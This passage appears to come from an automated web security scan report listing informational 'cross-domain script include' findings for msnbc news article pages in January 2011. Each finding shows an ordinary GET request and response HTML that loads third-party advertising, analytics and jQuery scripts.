...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.489. http://www.msnbc.redacted/id/41317259/ns/politics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41317259/ns/politics

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41317259/ns/politics HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:54:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 89571


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia4.redacted/j/MSNBC/Components/Photo/_new/110128-obama-mubarak-2010-1p.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.490. http://www.msnbc.redacted/id/41317259/ns/politics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41317259/ns/politics

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41317259/ns/politics HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Pragma: no-cache
RTSS: 1
Expires: Sun, 30 Jan 2011 17:11:22 GMT
Date: Sun, 30 Jan 2011 17:11:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 89589


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia4.redacted/j/MSNBC/Components/Photo/_new/110128-obama-mubarak-2010-1p.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7544"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.491. http://www.msnbc.redacted/id/41317259/ns/politics/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41317259/ns/politics/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41317259/ns/politics/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:54:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 89250


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia4.redacted/j/MSNBC/Components/Photo/_new/110128-obama-mubarak-2010-1p.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7544"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.492. http://www.msnbc.redacted/id/41317259/ns/politics/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41317259/ns/politics/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41317259/ns/politics/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 17:42:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 89270


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia4.redacted/j/MSNBC/Components/Photo/_new/110128-obama-mubarak-2010-1p.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.493. http://www.msnbc.redacted/id/41320309/ns/technology_and_science-tech_and_gadgets

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41320309/ns/technology_and_science-tech_and_gadgets

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41320309/ns/technology_and_science-tech_and_gadgets HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:55:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 74988


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia2.redacted/j/MSNBC/Components/Video/110128/nn_05bwi_tweets_110128.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7543"></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.494. http://www.msnbc.redacted/id/41321565/ns/business/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41321565/ns/business/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41321565/ns/business/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:55:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 57442


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link type="text/css" rel="stylesheet" media="print" href="http://assets1b.msnbc.redacted/rendering/msnbc/html40/assets/site_wide_print.css" />

<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7540"></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.495. http://www.msnbc.redacted/id/41322367/ns/local_news-dallasfort_worth_tx/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41322367/ns/local_news-dallasfort_worth_tx/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41322367/ns/local_news-dallasfort_worth_tx/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:55:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 54029


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://media.nbcdfw.com/images/397*298/96620629.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536"></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.496. http://www.msnbc.redacted/id/41322659/ns/local_news-dallasfort_worth_tx/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41322659/ns/local_news-dallasfort_worth_tx/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41322659/ns/local_news-dallasfort_worth_tx/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:54:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 56425


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://media.nbcdfw.com/images/397*298/cowboys+stadium+1.27.11.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536"></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.497. http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41323843/ns/world_news-mideastn_africa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41323843/ns/world_news-mideastn_africa HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:54:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 190719


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia1.redacted/j/MSNBC/Components/Video/110129/n_yousef_deaths2_110129.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.498. http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41323843/ns/world_news-mideastn_africa/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41323843/ns/world_news-mideastn_africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:54:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 190068


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia3.redacted/j/MSNBC/Components/Video/110129/nn_engel_egypt_110129.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.499. http://www.msnbc.redacted/id/41324031

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41324031

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41324031 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:54:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 63568


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link type="text/css" rel="stylesheet" media="print" href="http://assets1b.msnbc.redacted/rendering/msnbc/html40/assets/site_wide_print.css" />

<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.500. http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41324344/ns/world_news-south_and_central_asia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41324344/ns/world_news-south_and_central_asia HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:54:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 72587


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia1.redacted/j/MSNBC/Components/Video/110128/x_lon_pakshoot_110128.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.501. http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41324344/ns/world_news-south_and_central_asia/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41324344/ns/world_news-south_and_central_asia/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:54:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 72902


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia1.redacted/j/MSNBC/Components/Video/110128/x_lon_pakshoot_110128.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.502. http://www.msnbc.redacted/id/41324874/ns/us_news-weird_news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41324874/ns/us_news-weird_news

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41324874/ns/us_news-weird_news HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:54:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 56773


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link type="text/css" rel="stylesheet" media="print" href="http://assets1b.msnbc.redacted/rendering/msnbc/html40/assets/site_wide_print.css" />

<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536"></script>
...[SNIP]...
